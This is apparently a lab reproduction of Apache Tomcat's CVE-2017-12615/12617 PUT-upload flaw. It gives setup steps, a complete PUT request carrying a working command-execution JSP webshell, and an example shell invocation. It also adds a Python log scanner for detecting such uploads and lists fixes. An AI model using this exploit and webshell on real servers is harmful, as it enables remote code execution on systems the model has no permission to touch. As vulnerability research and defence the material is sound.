1. Background
On September 19, 2017, the Apache Tomcat project disclosed and fixed two high-risk vulnerabilities. One of them is a remote code execution vulnerability, CVE-2017-12615: when a vulnerable Tomcat runs on a Windows host with the HTTP PUT method enabled (that is, the readonly init parameter of the Default servlet set to false), a malicious visitor can upload a JSP file containing arbitrary code to the server with a crafted request. Requesting that JSP afterwards executes the code, so the impact is severe.
2. Affected versions
Apache Tomcat 7.0.0 to 7.0.79 (fixed in 7.0.81). The fix was incomplete: the follow-up CVE-2017-12617 extends the affected range to 7.0.81 (fixed in 7.0.82) and also covers the 8.0, 8.5 and 9.0 branches on all platforms, not only Windows.
3. Test environment
Windows 7
Apache Tomcat 7.0.56
JDK
4. Reproducing the vulnerability
Download the vulnerable Tomcat 7.0.56 from:
https://archive.apache.org/dist/tomcat/tomcat-7/v7.0.56/bin/
Choose the package that matches your operating system and install it.
A JDK must already be installed, since Tomcat needs it to run.
Visit http://localhost:8080; if the Tomcat welcome page appears, the installation is complete.
Next, open conf/web.xml. By default the readonly init parameter of the Default servlet is true, which forbids the HTTP PUT and DELETE request methods:
When readonly is set to false, files can be created and deleted through PUT/DELETE, and that is what makes the vulnerability reachable. So change readonly to false.
Find the servlet definition whose servlet-name is default (the org.apache.catalina.servlets.DefaultServlet entry) and add the following init-param inside it (note the closing tags and that the value goes in param-value, not a second param-name):
<init-param>
    <param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>
Start Tomcat and use Burp Suite to send a PUT request carrying the webshell. The target path is /1.jsp/ with a trailing slash on purpose: the slash keeps the request from matching the *.jsp mapping of the JspServlet, so the DefaultServlet handles it and writes the body to disk, where the file ends up as 1.jsp. The trailing-slash form is the one usually reported under the follow-up CVE-2017-12617; the Windows-only variants associated with CVE-2017-12615 append %20 or ::$DATA to the name instead, and all three work against this 7.0.56 target. Burp recalculates Content-Length when the body is edited.
PUT /1.jsp/ HTTP/1.1
Host: 192.168.243.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 660

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!
// Run a command and collect its stdout (errors are returned as text).
public static String excuteCmd(String c) {
    StringBuilder line = new StringBuilder();
    try {
        Process pro = Runtime.getRuntime().exec(c);
        BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
        String temp = null;
        while ((temp = buf.readLine()) != null) {
            line.append(temp + "\n");
        }
        buf.close();
    } catch (Exception e) {
        line.append(e.getMessage());
    }
    return line.toString();
}
%>
<%
// Only execute when the "pwd" parameter is 023 and a "cmd" parameter is present.
if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd"))) {
    out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
} else {
    out.println(":-)");
}
%>
A 201 Created response means the file was written. Then request the uploaded webshell with the password and a command taken from the JSP above, for example http://192.168.243.129:8080/1.jsp?pwd=023&cmd=whoami; if the command output comes back inside a <pre> block, the shell is working and the vulnerability is confirmed.
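Why the trailing slash (and the other suffixes) get past the JSP mapping, and how to spot such uploads in a Tomcat access log, as an added example that is not code from the original post. It models, in simplified form, two things the reproduction depends on: the servlet mapping Tomcat derives from conf/web.xml (the Servlet-spec order of exact, prefix, then extension match on the last path segment) and the name the file ends up with on the Windows host. It then uses both to flag PUT/DELETE requests in constructed access-log lines in Tomcat's common log format; the log lines, addresses and file names are all made up for the example.

```python
"""Model of the CVE-2017-12615 upload path (added example, not the post's code).

Reimplements, in simplified form, Tomcat's servlet mapping and the file-name
normalisation on the Windows target, then scans constructed access-log lines
for uploads that dodge the *.jsp mapping.
"""
from __future__ import annotations

from urllib.parse import unquote

# Default mappings from Tomcat's conf/web.xml: *.jsp/*.jspx go to the
# JspServlet ("jsp"), everything else to the DefaultServlet ("default"),
# which is the servlet that honours PUT/DELETE when readonly=false.
SERVLET_MAPPINGS = {"*.jsp": "jsp", "*.jspx": "jsp", "/": "default"}


def resolve_servlet(decoded_path: str) -> str:
    """Pick the servlet for a URL-decoded request path.

    Simplified Servlet-spec order: exact match, path-prefix match, then an
    extension match against the *last* path segment, else the default
    servlet. Longest-prefix tie-breaking is omitted (no prefix mappings here).
    """
    for pattern, name in SERVLET_MAPPINGS.items():
        if pattern == decoded_path:
            return name
    for pattern, name in SERVLET_MAPPINGS.items():
        if pattern.endswith("/*") and decoded_path.startswith(pattern[:-1]):
            return name
    last_segment = decoded_path.rsplit("/", 1)[-1]
    for pattern, name in SERVLET_MAPPINGS.items():
        if pattern.startswith("*.") and last_segment.endswith(pattern[1:]):
            return name
    return SERVLET_MAPPINGS["/"]


def windows_target_name(request_path: str) -> str:
    """File name the DefaultServlet ends up creating for the request path.

    Java path normalisation drops a trailing "/"; on Windows/NTFS a trailing
    space or dot is ignored and "::$DATA" names the file's own default data
    stream. So "/1.jsp/", "/1.jsp%20" and "/1.jsp::$DATA" all become 1.jsp.
    """
    name = unquote(request_path).rstrip("/").rsplit("/", 1)[-1]
    if name.endswith("::$DATA"):
        name = name[: -len("::$DATA")]
    return name.rstrip(" .")


def suspicious_puts(access_log: str) -> list[str]:
    """Request lines of PUT/DELETE calls whose path dodges the JSP mapping.

    Expects Tomcat's common log format: %h %l %u %t "%r" %s %b. A hit is a
    write method routed to the DefaultServlet whose on-disk name would still
    end in .jsp/.jspx. A plain "PUT /1.jsp" is not a hit: it reaches the
    JspServlet, which does not implement PUT (405).
    """
    hits = []
    for line in access_log.splitlines():
        parts = line.split('"')
        if len(parts) < 3:
            continue
        fields = parts[1].split()  # e.g. ['PUT', '/1.jsp/', 'HTTP/1.1']
        if len(fields) != 3 or fields[0] not in ("PUT", "DELETE"):
            continue
        path = fields[1].split("?", 1)[0]
        lands_on_jsp = windows_target_name(path).lower().endswith((".jsp", ".jspx"))
        if lands_on_jsp and resolve_servlet(unquote(path)) == "default":
            hits.append(parts[1])
    return hits


# Constructed sample (not real traffic): three upload attempts with the known
# suffixes, the shell being invoked afterwards, and one harmless PUT.
SAMPLE_LOG = """\
192.168.243.1 - - [19/Sep/2017:10:00:01 +0800] "GET /index.jsp HTTP/1.1" 200 11205
192.168.243.1 - - [19/Sep/2017:10:00:05 +0800] "PUT /1.jsp/ HTTP/1.1" 201 -
192.168.243.1 - - [19/Sep/2017:10:00:07 +0800] "PUT /2.jsp%20 HTTP/1.1" 201 -
192.168.243.1 - - [19/Sep/2017:10:00:09 +0800] "PUT /3.jsp::$DATA HTTP/1.1" 201 -
192.168.243.1 - - [19/Sep/2017:10:00:12 +0800] "GET /1.jsp?pwd=023&cmd=whoami HTTP/1.1" 200 58
192.168.243.1 - - [19/Sep/2017:10:00:15 +0800] "PUT /notes.txt HTTP/1.1" 201 -
"""

if __name__ == "__main__":
    for p in ("/1.jsp", "/1.jsp/", "/1.jsp%20", "/1.jsp::$DATA"):
        print(f"{p:16} -> {resolve_servlet(unquote(p)):8} writes {windows_target_name(p)}")
    for hit in suspicious_puts(SAMPLE_LOG):
        print("suspicious:", hit)
```

The same rule can be fed real localhost_access_log.*.txt files; a 201 on any flagged line is a confirmed write, and the GET that follows (the shell being called with its parameters) is the second thing to look for.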
5. Suggested fixes
- Set readonly back to true (or remove the init-param altogether, since true is the default), or forbid the PUT and DELETE methods for the application, then restart Tomcat. Note that if an application actually depends on PUT, disabling the method may break it.
- Upgrade to the latest patched version per the official advisory: for the 7.0 branch that means 7.0.82 or later, which also covers the incomplete-fix follow-up CVE-2017-12617.